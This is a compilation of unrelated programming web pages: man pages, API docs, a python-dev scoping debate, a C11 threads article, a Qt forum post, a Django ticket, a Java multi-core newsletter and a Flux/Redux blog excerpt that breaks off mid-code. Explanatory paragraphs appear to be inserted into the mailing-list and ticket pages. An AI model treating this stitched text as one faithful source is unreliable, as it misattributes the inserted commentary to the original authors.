        ),
      ),
    );
  }
}

Conclusion

In this Flutter tutorial we demonstrated how to use the Firebase console and the google_sign_in plugin to create a Google sign-in Flutter application.
https://protocoderspoint.com/flutter-firebase-google-signin/
fmin, fminf, fminl − determine minimum of two floating-point numbers

#include <math.h>

double fmin(double x, double y);
float fminf(float x, float y);
long double fminl(long double x, long double y);

Link with −lm.

Feature Test Macro Requirements for glibc (see feature_test_macros(7)): fmin(), fminf(), fminl(): _XOPEN_SOURCE >= 600 || _ISOC99_SOURCE || _POSIX_C_SOURCE >= 200112L; or cc -std=c99

These functions return the lesser value of x and y.

These functions return the minimum.

fmax(3)

This page is part of release 3.53 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at−pages/.
http://man.linuxtool.net/centos7/u3/man/3_fminf.html
cc [ flag ... ] file ...-lnvpair [ library ... ] #include <libnvpair.h> These functions find the nvpair (name-value pair) that matches the name and type as indicated by the interface name. If one is found, nelem and val are modified to contain the number of elements in value and the starting address of data, respectively. These functions work for nvlists (lists of name-value pairs) allocated with NV_UNIQUE_NAME or NV_UNIQUE_NAME_TYPE specified in nvlist_alloc(). (See nv_list_alloc(3nvpair).) If this is not the case, the function returns ENOTSUP because the list potentially contains multiple nvpairs with the same name and type. All memory required for storing the array elements, including string value, are managed by the library. References to such data remain valid until nvlist_free() is called on nvl. Upon successful completion, 0 is returned. Otherwise, -1 is returned and errno is set to indicate the error. These functions will fail if: See attributes(5) for descriptions of the following attributes: libnvpair(3NVPAIR), attributes(5)
http://www.shrubbery.net/solaris9ab/SUNWaman/hman3nvpair/nvlist_lookup_boolean.3nvpair.html
[Guido]
> I seem to have trouble explaining what I meant.

I know, and I confess I'm giving you a hard time. There's a point to that too: uniqueness also imposes costs on newbies and/or newcomers. Across the world of programming languages now, dynamic scoping and lexical scoping are "almost entirely *it*". For example, the Perl spelling of the running example here does work the way you intend, but the explanation in Perl is full-blown dynamic scoping:

sub g {
    print "$x\n";     # prints 12 -- "full-blown dynamic scoping"
}

sub f {
    print "$x\n";     # prints 10
    local($x) = 12;
    &g();
}

$x = 10;
&f();
print "$x\n";         # prints 10

Once you make f print 10, you're on that path as far as anyone coming from any other language can tell at first glance (or even second and third). If you go on to make g print 10 too, it's inexplicable via reference to how any other language works. If there were a huge payback for "being different" here, cool, but the only real payback I see is letting newbies avoid learning how lexical scoping works, and only for a little while.

> Long ago, before I introduced LOAD_FAST and friends, Python had
> something that for want of a better term I'll call "lexical scoping
> with dynamic lookup".

I'm old enough to remember this <wink>.

> It did a dynamic lookup in a (max 3 deep: local / global / builtin)
> stack of namespaces, but the set of namespaces was determined by the
> compiler. This does not have the problems of dynamic scoping (the
> caller's stack frame can't cause trouble). But it also doesn't have
> the problem of the current strict static scoping.

Nor its advantages, including better error detection, and ease of transferring hard-won knowledge among other lexically scoped languages.
> I like the older model better than the current model (apart from
> nested scopes) and I believe that the "only runtime" rule explains why
> the old model is more attractive: it doesn't require you to think of
> the compiler scanning all the code of your function looking for
> definitions of names. You can think of the interpreter pretty much
> executing code as it sees it. You have to have a model for name
> lookup that requires a chaining of namespaces based on where a
> function is defined, but that's all still purely runtime (it involves
> executing the def statement).
>
> This requires some sophistication for a newbie to understand, but it's
> been explained successfully for years, and the explanation would be
> easier without UnboundLocalError.
>
> Note that it explains your example above completely: the namespace
> where f is defined contains a definition of x when f is called, and
> thus the search stops there.

Does it scale?

x = 0

def f(i):
    if i & 4:
        x = 10
    def g(i):
        if i & 2:
            x = 20
        def h(i):
            if i & 1:
                x = 30
            print x
        h(i)
    g(i)

f(3)

I can look at that today and predict with confidence that h() will either print 30 (if and only if i is odd), or raise an exception. This is from purely local analysis of h's body -- it doesn't matter that it's nested, and it's irrelevant what the enclosing functions look like or do. That's a great aid to writing correct code. If the value of x h sees *may* come from h, or from g, or from f, or from the module scope instead, depending on i's specific value at the time f is called, there's a lot more to think about. I could keep local+global straight in pre-1.0 Python, although I never got used to the inability to write nested functions that could refer to each other (perhaps you've forgotten how many times you had to explain that one, and how difficult it was to get across?).
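Tim's prediction is easy to check today. Here is the same example adapted to Python 3 syntax (print as a function), showing both the odd and the even case:

```python
x = 0

def f(i):
    if i & 4:
        x = 10
    def g(i):
        if i & 2:
            x = 20
        def h(i):
            if i & 1:
                x = 30
            print(x)        # x is local to h: assigned only when i is odd
        h(i)
    g(i)

f(3)                        # h's local x is bound -> prints 30
try:
    f(2)                    # h's local x is never bound
except UnboundLocalError as exc:
    print("UnboundLocalError:", exc)
```

Because h contains an assignment to x, the compiler makes x local to h, so the even case raises UnboundLocalError instead of finding g's or the module's x.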
Now that Python has full-blown nested scopes, the namespace interactions are potentially much more convoluted, and the "purely local analysis" shortcut made possible by everyone else's <wink> notion of lexical scoping becomes correspondingly more valuable.

> ...
> Um, that's not what I'd call dynamic scoping. It's dynamic lookup.

I know -- the problem is that you're the only one in the world making this distinction, and that makes it hard to maintain over time. If it had some killer advantage ... but it doesn't seem to. When Python switched to "strict local" names before 1.0, I don't recall anyone complaining -- if there was a real advantage to dynamic lookup at the local scope, it appeared to have escaped Python's users <wink>. I'll grant that it did make exec and "import *" more predictable in corner cases.

> It's trouble for a compiler that wants to optimize builtins, but the
> semantic model is nice and simple and easy to explain with the "only
> runtime" rule.

Dynamic scoping is also easy to explain, but it doesn't scale. I'm afraid dynamic lookup doesn't scale either. You should have stuck with Python's original two-level namespace, you know <0.9 wink>.

the-builtins-didn't-count-ly y'rs - tim
https://mail.python.org/pipermail/python-dev/2002-April/023442.html
Neptune-XGBoost Integration¶ What will you get with this integration?¶ XGBoost is an optimized distributed gradient boosting library designed to be highly efficient, flexible and portable. The integration with Neptune lets you log multiple training artifacts with no further customization. The integration is implemented as an XGBoost callback and provides the following capabilities: Log metrics (train and eval) after each boosting iteration. Log the model (Booster) to Neptune after the last boosting iteration. Log feature importance to Neptune as an image after the last boosting iteration. Log visualized trees to Neptune as images after the last boosting iteration. Note This integration is tested with xgboost==1.2.0 and neptune-client==0.4.132. Where to start?¶ To get started with this integration, follow the Quickstart below. If you want to try things out and focus only on the code you can either: Quickstart¶ This quickstart will show you how to log XGBoost experiments to Neptune using the XGBoost-Neptune integration. The integration is implemented as an XGBoost callback and made available in the neptune-contrib library. As a result you will have an experiment logged to Neptune with metrics, model, feature importances and (optionally, requires graphviz) visualized trees. Have a look at this example experiment. Before you start¶ You have Python 3.x and the following libraries installed: neptune-client: See the neptune-client installation guide. neptune-contrib[monitoring]: See the neptune-contrib installation guide. xgboost==1.2.0: See the XGBoost installation guide. pandas==1.0.5 and scikit-learn==0.23.1: See the pandas installation guide and scikit-learn installation guide. Example¶ Make sure you have created an experiment before you start XGBoost training. Use the create_experiment() method to do this. Here is how to use the Neptune-XGBoost integration: import neptune ...
# here you import `neptune_callback` that does the magic (the open source magic :)
from neptunecontrib.monitoring.xgboost import neptune_callback
...
# Use neptune callback
neptune.create_experiment(name='xgb', tags=['train'], params=params)
xgb.train(params, dtrain, num_round, watchlist,
          callbacks=[neptune_callback()])  # neptune_callback is here

Logged metrics¶ These are logged for train and eval (or whatever you defined in the watchlist) after each boosting iteration. Logged model¶ The model (Booster) is logged to Neptune after the last boosting iteration. If you run cross-validation, you get a model for each fold. Logged feature importance¶ This is a very useful chart, as it shows feature importance. It is logged to Neptune as an image after the last boosting iteration. If you run cross-validation, you get a feature importance chart for each fold's model. Logged visualized trees (requires graphviz)¶ Note You need to install graphviz and the graphviz Python interface for the log_tree feature to work. Check Graphviz and Graphviz Python interface for installation info. Log the first 6 trees at the end of training (trees with indices 0, 1, 2, 3, 4, 5):

xgb.train(params, dtrain, num_round, watchlist,
          callbacks=[neptune_callback(log_tree=[0,1,2,3,4,5])])

Selected trees are logged to Neptune as an image after the last boosting iteration. If you run cross-validation, you get a tree visualization for each fold's model, independently. Explore Results¶ You just learned how to start logging XGBoost experiments to Neptune. Check this experiment or view the quickstart code as a plain Python script on GitHub. Common problems¶ If you are using a Windows machine with Python 3.8 and xgboost==1.2.1, you may encounter a tkinter error when logging feature importance. This problem does not occur on a Windows machine with Python 3.8 and xgboost==1.2.0, nor with Python 3.6 or Python 3.7. How to ask for help?¶ Please visit the Getting help page.
Everything regarding support is there.
https://docs-legacy.neptune.ai/integrations/xgboost.html
Technical Support On-Line Manuals RL-ARM User's Guide (MDK v4)

#include <rtl.h>

BOOL tcp_close (
  U8 socket );    /* TCP socket to close. */

The tcp_close function initiates the procedure to close the TCP connection. It might take some time to close the connection. The argument socket specifies the handle of the socket whose connection is to be closed. TCPnet calls the listener callback function only when a remote peer has closed the connection. If the socket closing is initiated locally by calling tcp_close, the callback function is not called. When a socket type is TCP_TYPE_SERVER or TCP_TYPE_CLIENT_SERVER, the socket does not close after calling tcp_close. The active connection is closed, and the socket transitions to TCP_STATE_LISTEN. In this state, the socket is still able to accept incoming connections. To close the TCP_TYPE_SERVER socket, the function tcp_close needs to be called twice. The tcp_close function is in the RL-TCPnet library. The prototype is defined in rtl.h.

Note: The tcp_close function returns __TRUE if the connection closing procedure has been started successfully. Otherwise, the function returns __FALSE.

See also: tcp_abort, tcp_release_socket

#include <rtl.h>

void disconnect_tcp (U8 tcp_soc) {
  ..
  /* This TCP connection is no longer needed. */
  tcp_close (tcp_soc);
  /* Release the TCP socket later, in a polling function. */
}

void poll_socket (U8 tcp_soc) {
  int state;

  state = tcp_get_state (tcp_soc);
  if (state > TCP_STATE_LISTEN) {
    /* Closing procedure is ongoing. */
    return;
  }
  if (state == TCP_STATE_LISTEN) {
    /* Socket has the TCP_TYPE_SERVER attribute and */
    /* needs an additional close request.           */
    tcp_close (tcp_soc);
  }
  /* The socket is in the TCP_STATE_CLOSED state now. */
  tcp_release_socket (tcp_soc);
}
https://www.keil.com/support/man/docs/rlarm/rlarm_tcp_close.htm
The committee that standardizes the C programming language (ISO/IEC JTC1/SC22/WG14) has completed a major revision of the C standard. The previous version of the standard, completed in 1999, was colloquially known as "C99." As one might expect, the new revision completed at the very end of last year is known as "C11." In this article and its companion article, I will describe the major new features of C11 in concurrency, security, and ease of use. A final article will discuss compatibility between C11 and C++. Concurrency C11 standardizes the semantics of multithreaded programs, potentially running on multicore platforms, and lightweight inter-thread communication using atomic variables. The header <threads.h> provides macros, types, and functions to support multi-threading. Here is a summary of the macros, types, and enumeration constants:
- Macros: thread_local, ONCE_FLAG, TSS_DTOR_ITERATIONS.
- Types: cnd_t, thrd_t, tss_t, mtx_t, tss_dtor_t, thrd_start_t, once_flag.
- Enumeration constants to pass to mtx_init: mtx_plain, mtx_recursive, mtx_timed.
- Enumeration constants for threads: thrd_timedout, thrd_success, thrd_busy, thrd_error, thrd_nomem.
- Functions for condition variables:
  void call_once(once_flag *flag, void (*func)(void));
  int cnd_broadcast(cnd_t *cond);
  void cnd_destroy(cnd_t *cond);
  int cnd_init(cnd_t *cond);
  int cnd_signal(cnd_t *cond);
  int cnd_timedwait(cnd_t *restrict cond, mtx_t *restrict mtx, const struct timespec *restrict ts);
  int cnd_wait(cnd_t *cond, mtx_t *mtx);
- The mutex functions:
  void mtx_destroy(mtx_t *mtx);
  int mtx_init(mtx_t *mtx, int type);
  int mtx_lock(mtx_t *mtx);
  int mtx_timedlock(mtx_t *restrict mtx, const struct timespec *restrict ts);
  int mtx_trylock(mtx_t *mtx);
  int mtx_unlock(mtx_t *mtx);
- Thread functions:
  int thrd_create(thrd_t *thr, thrd_start_t func, void *arg);
  thrd_t thrd_current(void);
  int thrd_detach(thrd_t thr);
  int thrd_equal(thrd_t thr0, thrd_t thr1);
  noreturn void thrd_exit(int res);
  int thrd_join(thrd_t thr, int *res);
  int thrd_sleep(const struct timespec *duration, struct timespec *remaining);
  void thrd_yield(void);
- Thread-specific storage functions:
  int tss_create(tss_t *key, tss_dtor_t dtor);
  void tss_delete(tss_t key);
  void *tss_get(tss_t key);
  int tss_set(tss_t key, void *val);

These standardized library functions are more likely to be used as a foundation for easier-to-use APIs than as a platform for building applications. (See "When Tasks Replace Objects," by Andrew Binstock, for a discussion of higher-level APIs.) For example, when using these low-level library functions it is very easy to create a data race, in which two or more threads write (or write-and-read) the same location without synchronization. The C (and C++) standards permit any behavior if a data race happens on some variable x, which can lead to serious trouble. For example, some bytes of the value of x might be set by one thread and other bytes by another thread ("torn values"), or some side-effect that appears to take place after an assignment to x might (to another thread or another processor) appear to take place before that assignment.
Here is a short program that contains an obvious data race, where the 64-bit integer (long long) named x is written and read by two threads:

#include <threads.h>
#include <stdio.h>

#define N 100000

char buf1[N][99]={0}, buf2[N][99]={0};
long long old1, old2, limit=N;
long long x = 0;

static int do1(void *arg)
{
    long long o1, o2, n1;
    for (long long i1 = 1; i1 < limit; ++i1) {
        old1 = x, x = i1;
        o1 = old1; o2 = old2;
        if (o1 > 0) {   // x was set by this thread
            if (o1 != i1-1)
                sprintf(buf1[i1],
                    "thread 1: o1=%7lld, i1=%7lld, o2=%7lld", o1, i1, o2);
        } else {        // x was set by the other thread
            n1 = x, x = i1;
            if (n1 < 0 && n1 > o1)
                sprintf(buf1[i1],
                    "thread 1: o1=%7lld, i1=%7lld, n1=%7lld", o1, i1, n1);
        }
    }
    return 0;
}

static int do2(void *arg)
{
    long long o1, o2, n2;
    for (long long i2 = -1; i2 > -limit; --i2) {
        old2 = x, x = i2;
        o1 = old1; o2 = old2;
        if (o2 < 0) {   // x was set by this thread
            if (o2 != i2+1)
                sprintf(buf2[-i2],
                    "thread 2: o2=%7lld, i2=%7lld, o1=%7lld", o2, i2, o1);
        } else {        // x was set by the other thread
            n2 = x, x = i2;
            if (n2 > 0 && n2 < o2)
                sprintf(buf2[-i2],
                    "thread 2: o2=%7lld, i2=%7lld, n2=%7lld", o2, i2, n2);
        }
    }
    return 0;
}

int main(int argc, char *argv[])
{
    thrd_t thr1;
    thrd_t thr2;
    thrd_create(&thr1, do1, 0);
    thrd_create(&thr2, do2, 0);
    thrd_join(thr2, 0);
    thrd_join(thr1, 0);
    for (long long i = 0; i < limit; ++i) {
        if (buf1[i][0] != '\0') printf("%s\n", buf1[i]);
        if (buf2[i][0] != '\0') printf("%s\n", buf2[i]);
    }
    return 0;
}

If you had an implementation that already conformed to the C11 standard, and you compiled this program for a 32-bit machine (so that a 64-bit long long is written in two or more memory cycles), you could expect to see confirmation of the data race, with a varying number of lines of output such as this:

thread 2: o2=-4294947504, i2=    -21, o1=  19792

The traditional solution for data races has been to create a lock. However, using atomic data can sometimes be more efficient. Loads and stores of atomic types are done with sequentially consistent semantics.
In particular, if thread-1 stores a value in an atomic variable named x, and thread-2 reads that value, then all other stores previously performed in thread-1 (even to non-atomic objects) become visible to thread-2. (The C11 and C++11 standards also provide other models of memory consistency, but even experts are cautioned to avoid them.)

The new header <stdatomic.h> provides a large set of named types and functions for the manipulation of atomic data. For example, atomic_llong is the typename provided for atomic long long integers. Similar names are provided for all the integer types. One of these typenames, atomic_flag, is required to be lock free. The standard includes a macro named ATOMIC_VAR_INIT(n), for initializing atomic integers, as shown below.

The data race in the previous example can be cured by making x an atomic_llong variable. Simply change the one line that declares x in the aforementioned code sample:

#include <stdatomic.h>

atomic_llong x = ATOMIC_VAR_INIT(0);

By using this atomic variable, the code operates without producing any data-race output.
http://www.drdobbs.com/mobile/c-finally-gets-a-new-standard/232800444
Memory leak when using sourceSize on images in list views?

Hi. I'm having memory problems in my application that appear to be due to using sourceSize on images in list views. I've included a small QML example below that illustrates the issue. It requires a bunch of images in the current directory, which I have not included.

When scrolling to the end or the beginning of a list view, I expect to see the memory allocation of qmlscene drop, since list items are released. When setting sourceSize equal to the image size, the allocation increases for each image coming into view, but never decreases. Scrolling back and forth for a while seems to increase the memory use more and more. However, setting the sourceSize to something different than the image size (such as five times larger) does show the expected behaviour at the end and beginning of the lists.

Thing is, in my real application, I'm changing out loads of list items at fast rates in list views, and the memory consumption goes through the roof, since list items (or at least the pixmaps in them) that I expect to go away linger somewhere. Could someone confirm/speculate a bit on if this is indeed a memory leak in Qt and if I should file a bug report, or is this some sort of feature or effect of how sourceSize is supposed to work?

@
import QtQuick 2.0
import Qt.labs.folderlistmodel 2.1

Rectangle {
    id: viewer
    width: 800
    height: 480

    ListModel {
        id: picSrcList
    }

    FolderListModel {
        id: folderModel
        nameFilters: ["*.png", "*.jpg"]
    }

    Component {
        id: picDelegate
        Image {
            id: dynamicImage
            source: fileName
            sourceSize.width: dynamicImage.width // * 5
            sourceSize.height: dynamicImage.height // * 5
            width: 200
            height: 200
        }
    }

    ListView {
        id: picListView
        anchors.fill: parent
        delegate: picDelegate
        model: folderModel
        orientation: ListView.Vertical
    }
}
@

Win7, Linux, 5.2, 5.3

Possibly related to
https://forum.qt.io/topic/40413/memory-leak-when-using-sourcesize-on-images-in-list-views
Opened 7 years ago Last modified 6 months ago

#9173 new New feature

Conditional content of template blocks

Description

It would be very good if there were some way to mark a sort of "conditional content" of template blocks ({% block .. %}), that is, content that is displayed only if the block has some content in a child template. For instance, we have 2 templates:

parent.html

<table>
 <tr>
  <td>{% block firstcol %}{% endblock %}</td>
  <td>{% block secondcol %}{% endblock %}</td>
  {% block thirdcol %}<td>{% blockcontent %}</td>{% endblock %}
 </tr>
</table>

child.html

{% extends 'parent.html' %}
{% block firstcol %} 1 {% endblock %}
{% block firstcol %} 2 {% endblock %}

We should have such an output text:

<table>
 <tr>
  <td> 1 </td>
  <td> 2 </td>
 </tr>
</table>

but not the following:

<table>
 <tr>
  <td> 1 </td>
  <td> 2 </td>
  <td></td>
 </tr>
</table>

Attachments (1)

Change History (10)

comment:1 Changed 7 years ago by while0pass
- Needs documentation unset
- Needs tests unset
- Patch needs improvement unset

comment:2 Changed 6 years ago by jacob
- Triage Stage changed from Unreviewed to Design decision needed

comment:3 Changed 4 years ago by lukeplant
- Severity set to Normal
- Type set to New feature

Changed 4 years ago by adurdin

Patch against current trunk

comment:4 Changed 4 years ago by adurdin
- Easy pickings unset
- Has patch set
- Version changed from 1.0 to SVN

This scratches an itch for me too, so I thought I'd implement it. My patch in ticket9173.diff (against r16253) implements a new tag, ifnotempty, with the following behaviour:

Renders only if at least one variable or template tag within also renders. This allows a variable or template tag to be surrounded by markup, with the markup omitted if the variable or template tag does not render. An `{% else %}` block may also be used.
In the following example, the section will not be rendered unless another template extends this one and overrides the `more_information` block::

{% ifnotempty %}
<section>
  <h1>More information</h1>
  {% block more_information %}{% endblock %}
</section>
{% endifnotempty %}

comment:5 Changed 3 years ago by aaugustin
- UI/UX unset

Change UI/UX from NULL to False.

comment:6 Changed 3 years ago by masterjakul@…
- Cc masterjakul@… added

comment:7 Changed 2 years ago by jacob
- Triage Stage changed from Design decision needed to Someday/Maybe

I'm wholly unconvinced by the syntax proposed so far; it seems quite complicated and non-intuitive. However, I'm not opposed to the idea in general. So marking "someday" -- if someone comes up with syntax that makes sense and is easy to explain, then we might consider this.

comment:8 Changed 22 months ago by FunkyBob
- Cc FunkyBob added

I ended up implementing a {% wrapif %} tag, which will render the [optional] head and tail blocks if the body renders as a non-blank [not all whitespace] string.

{% wrapif %}
<td>
{% body %}
{% block whatever %}{% endblock %}
{% tail %}
</td>
{% endwrapif %}

If body is omitted, the first block is assumed to be the body, and the head empty. If tail is omitted, it is considered empty. I mostly did this to help move container tags out of for loops, where they'd be inside a {% if forloop.first %} and thus cause a test every iteration.

comment:9 Changed 6 months ago by alimony

I was thinking about this the other day.
How about something like:

parent.html

<table>
 <tr>
  <td>{% block firstcol %}{% endblock %}</td>
  <td>{% block secondcol %}{% endblock %}</td>
  {% block thirdcol if block.child %}<td>{{ block.child }}</td>{% endblock %}
 </tr>
</table>

Which would introduce a {{ block.child }} thing similar to {{ block.super }}

And also conditional blocks in general, in which you can specify:

{% block title if post.title %}My title{% endif%}

Which is the equivalent of, but shorter than:

{% block title %}
  {% if post.title %}
    {{ post.title }}
  {% else %}
    {{ block.super }}
  {% endif %}
{% endblock %}

What do you think of all the above?

typo: second "firstcol" should be "secondcol", like this:
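The semantics that both the proposed ifnotempty tag and FunkyBob's wrapif describe — render the block body first, then emit the surrounding markup only if the body is non-blank — can be sketched outside Django as plain string logic. The function name below is illustrative, not part of any Django API:

```python
def wrap_if_not_empty(body, head="", tail=""):
    """Emit head + body + tail only when the rendered body is non-blank.

    `body` stands in for the rendered contents of a template block;
    "non-blank" means not all whitespace, matching the wrapif wording.
    """
    if body.strip():
        return head + body + tail
    return ""

# An overridden block renders content, so the wrapper markup appears:
print(wrap_if_not_empty("1", "<td>", "</td>"))   # -> <td>1</td>
# A non-overridden (blank) block suppresses the wrapper entirely:
print(repr(wrap_if_not_empty("   ", "<td>", "</td>")))  # -> ''
```

A real template tag would render its child nodelist to get `body`, but the conditional-wrapping decision reduces to exactly this check.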
https://code.djangoproject.com/ticket/9173
Welcome to the 135th edition of The Java(tm) Specialists' Newsletter, now sent from a beautiful little island in Greece. We arrived safely two weeks ago and have been running around organising the basics, such as purchasing a vehicle, opening a bank account, getting cell phone contracts. Things happen really quickly in Greece. We can get my wife's Greek birth certificate in one week. In South Africa, this took me about 4 months to do. In about a week's time, I should be ready to apply for permanent residence here in Greece, so now I am the "First Java Champion in Greece" :))

A few weeks ago, I presented a Java 5 and a Design Patterns Course in Cape Town to a bunch of developers. They were mostly developing in Linux, and one of the chaps was impressing us all with his multi-core machine. A Dell Latitude notebook, with tons of RAM, a great graphics card, etc. It looked really fast, especially the 3D effects of his desktop.

One of the exercises that we do in the Java 5 course is to measure the CPU cycles that a thread has used, as opposed to elapsed time. If you have one CPU in your machine, then these should be roughly the same. However, when you have several CPUs in your machine, the CPU cycles should be a factor more than the elapsed time. The factor should never be more than the number of actual CPUs, and may be less when you either have other processes running, or too many threads per CPU. Also, as all good computer scientists know, you can never scale completely linearly on one machine, so as you approach a large number of CPUs, the factor will grow more slowly.

Here is a short piece of code that starts 5 threads. Each thread runs through a loop from 0 to 999999999. For each thread we measure the thread CPU time with the new ThreadMXBean.
These are added up and then we divide the total by the elapsed time (also called "wall clock time"). In order not to introduce contention, I'm using the AtomicLong and the CountDownLatch.

import java.lang.management.*;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.atomic.AtomicLong;

public class MultiCoreTester {
  private static final int THREADS = 5;
  private static CountDownLatch ct = new CountDownLatch(THREADS);
  private static AtomicLong total = new AtomicLong();

  public static void main(String[] args) throws InterruptedException {
    long elapsedTime = System.nanoTime();
    for (int i = 0; i < THREADS; i++) {
      Thread thread = new Thread() {
        public void run() {
          total.addAndGet(measureThreadCpuTime());
          ct.countDown();
        }
      };
      thread.start();
    }
    ct.await();
    elapsedTime = System.nanoTime() - elapsedTime;
    System.out.println("Total elapsed time " + elapsedTime);
    System.out.println("Total thread CPU time " + total.get());
    double factor = total.get();
    factor /= elapsedTime;
    System.out.printf("Factor: %.2f%n", factor);
  }

  private static long measureThreadCpuTime() {
    ThreadMXBean tm = ManagementFactory.getThreadMXBean();
    long cpuTime = tm.getCurrentThreadCpuTime();
    long total = 0;
    for (int i = 0; i < 1000 * 1000 * 1000; i++) {
      // keep ourselves busy for a while ...
      // note: we had to add some "work" into the loop or Java 6
      // optimizes it away.  Thanks to Daniel Einspanjer for
      // pointing that out.
      total += i;
      total *= 10;
    }
    cpuTime = tm.getCurrentThreadCpuTime() - cpuTime;
    System.out.println(total + " ... " + Thread.currentThread() +
        ": cpuTime = " + cpuTime);
    return cpuTime;
  }
}

When I run this on my little D800 Latitude, I get:

Thread[Thread-3,5,main]: cpuTime = 1920000000
Thread[Thread-2,5,main]: cpuTime = 1920000000
Thread[Thread-1,5,main]: cpuTime = 1930000000
Thread[Thread-4,5,main]: cpuTime = 1920000000
Thread[Thread-0,5,main]: cpuTime = 1940000000
Total elapsed time 9759677000
Total thread CPU time 9630000000
Factor: 0.99

As always with performance testing, we have to be careful to run it on a quiet machine. If I copy a large file at the same time while running the test, I get:

Thread[Thread-0,5,main]: cpuTime = 1920000000
Thread[Thread-4,5,main]: cpuTime = 1990000000
Thread[Thread-2,5,main]: cpuTime = 1960000000
Thread[Thread-1,5,main]: cpuTime = 1980000000
Thread[Thread-3,5,main]: cpuTime = 1960000000
Total elapsed time 10979895000
Total thread CPU time 9810000000
Factor: 0.89

When I run the program twice in parallel on a quiet system, the Factor should be close to 0.5, hopefully:

Thread[Thread-3,5,main]: cpuTime = 4090000000
Thread[Thread-4,5,main]: cpuTime = 4070000000
Thread[Thread-0,5,main]: cpuTime = 2660000000
Thread[Thread-2,5,main]: cpuTime = 4020000000
Thread[Thread-1,5,main]: cpuTime = 2970000000
Total elapsed time 33988220000
Total thread CPU time 17810000000
Factor: 0.52

and the second run, started slightly later

Thread[Thread-1,5,main]: cpuTime = 3320000000
Thread[Thread-3,5,main]: cpuTime = 3120000000
Thread[Thread-4,5,main]: cpuTime = 3190000000
Thread[Thread-0,5,main]: cpuTime = 2590000000
Thread[Thread-2,5,main]: cpuTime = 3070000000
Total elapsed time 32353817000
Total thread CPU time 15290000000
Factor: 0.47

When we ran this program on the student's supa-dupa multi-core system, we were puzzled in that the factor was just below 1. We rebooted the machine into Windows, and the factor went up to just below 2. Fortunately we had a system administrator in the group, and he pointed out that the kernel on that Linux machine was incorrect.
By simply putting the correct kernel on, the dream machine laptop was able to run at double the CPU cycles.

Your exercise for today is to find a multi-core or multi-cpu machine and see what factor you get. You need at least a JDK 5. Let me know how you fare ... :) Just a hint: the number of threads should probably be a multiple of the number of CPUs or cores that you have available.

Kind regards from Greece
https://www.javaspecialists.eu/archive/Issue135-Are-You-Really-Multi-Core.html
"Flux VS Single State Tree?". In asking this I am not trying to favor my own creation over Redux. You might say now: "But is not Redux a single state tree?". Yeah, it is! So what is the difference between Redux and a single state tree library like Baobab? Please read on and I will explain. I will also be answering a more fundamental question about Flux's verbosity, even in Redux. Yes, I will actually say something bad about Redux. It does not feel good, because Redux is a really great project and Dan Abramov is one of the most humble developers in the community. But I think Dan will agree that even though Redux is stated by some as the de facto standard for Flux, we should still bring in new ideas and talk about how we can solve our day to day problems with different approaches.

If you have not heard of Flux before you should read up a bit on that first. I will be using Facebook Flux, the Alt project and Redux to explain the evolution of Flux. Then I will compare them to using a single state tree like Baobab to point out that there is a different approach.

Flux basics

Though Flux has evolved with many different implementations there is still a core idea to Flux. I will not talk about the components, but just imagine they are the ones who trigger state changes and retrieve the current state of the application. Lets draw this up:

|-----------------|                            |----------------|
| STATE CONTAINER |<-----|                 |---| ACTION CREATOR |---<
|-----------------|      |                 |   |----------------|
                         |                 |
|-----------------|   |------------|       |   |----------------|
| STATE CONTAINER |<--| DISPATCHER |<------+---| ACTION CREATOR |---<
|-----------------|   |------------|       |   |----------------|
                         |      ^          |
|-----------------|      |      |          |   |----------------|
| STATE CONTAINER |<-----|      |          |---| ACTION CREATOR |---<
|-----------------|             |              |----------------|
                                |
                                |----------------------------------<

A state container is either a store or a reducer, and with Flux you need to dispatch actions to these state containers.
There are mainly two reasons why you do this dispatching. First of all it gives you a predictable flow. All requests for state change pass through this dispatcher and reach all state containers. The second reason is that the action object describes a state change in your application without actually doing it. That means this description can be stored. If you reset the state of your application and run these stored state change descriptions you will bring your application back into the exact same state (time travel debugging).

Store / Reducer

You need a place to contain your state. The initial release of Flux calls these state containers stores. They are typically created with a plain object, like:

const TodosStore = {
  isSaving: false,
  list: []
};

With Alt this was turned into a class:

class TodosStore {
  constructor() {
    this.isSaving = false;
    this.list = [];
  }
}

And with Redux we use a function, called a reducer. How reducers differ is that you return state changes instead of mutating the existing state. We use the ImmutableJS project to create our initial state and we will continue to use this library to change our state in the Redux examples below.

import Immutable from 'immutable';

const initialState = Immutable.fromJS({
  isSaving: false,
  list: []
});

function TodosReducer(state = initialState, action) {
  return state;
}

So all these abstractions have the same purpose. They store state. The way they differ is how you act upon actions and change the state. Lets talk about actions first.

Actions

With traditional Flux you use a switch statement and we check the action type to act on an action.
This means that all actions reach all stores:

import dispatcher from './dispatcher';

const TodosStore = {
  isSaving: false,
  list: []
};

TodosStore.dispatchToken = dispatcher.register((payload) => {
  switch (payload.actionType) {
    case 'SAVING_TODO':
      TodosStore.isSaving = true;
      break;
    case 'ADD_TODO':
      TodosStore.list.push(payload.todo);
      break;
    case 'SAVED_TODO':
      TodosStore.isSaving = false;
      break;
  }
});

With Alt you actually wire the specific actions to the store. The switch statement is often seen as a verbose construct, and with good reason, it is :-) We will look at the actions implementation in the next section, but this is how you would wire it up inside the store:

import TodosActions from './TodosActions';

class TodosStore {
  constructor() {
    this.isSaving = false;
    this.list = [];
    this.bindListeners({
      handleSavingTodo: TodosActions.SAVING_TODO,
      handleAddTodo: TodosActions.ADD_TODO,
      handleSavedTodo: TodosActions.SAVED_TODO
    });
  }
  handleSavingTodo() {
    this.isSaving = true;
  }
  handleAddTodo(todo) {
    this.list.push(todo);
  }
  handleSavedTodo() {
    this.isSaving = false;
  }
}

With Redux and a reducer you move back to using switch statements. Notice how we use Immutable JS to return completely new state from the reducer.

import Immutable from 'immutable';

const initialState = Immutable.fromJS({
  isSaving: false,
  list: []
});

function TodosReducer(state = initialState, action) {
  switch (action.type) {
    case SAVING_TODO:
      return state.set('isSaving', true);
    case ADD_TODO:
      return state.updateIn(['list'], list => list.push(action.todo));
    case SAVED_TODO:
      return state.set('isSaving', false);
  }
  return state;
}

Action creators

The initial Flux implementation and Redux allow you to dispatch actions directly to stores/reducers, though very often you need an action creator. An action creator is a function that will do multiple dispatches to the stores. This is often related to asynchronous operations, like talking to the server.
With traditional Flux:

import dispatcher from './dispatcher';
import ajax from 'ajax';

export default function addTodo(todo) {
  dispatcher.dispatch({actionType: 'SAVING_TODO'});
  ajax.post('/todos', todo)
    .then(() => {
      dispatcher.dispatch({actionType: 'SAVED_TODO'});
      dispatcher.dispatch({actionType: 'ADD_TODO', todo: todo});
    });
}

With Alt you always have to use an action creator.

import ajax from 'ajax';

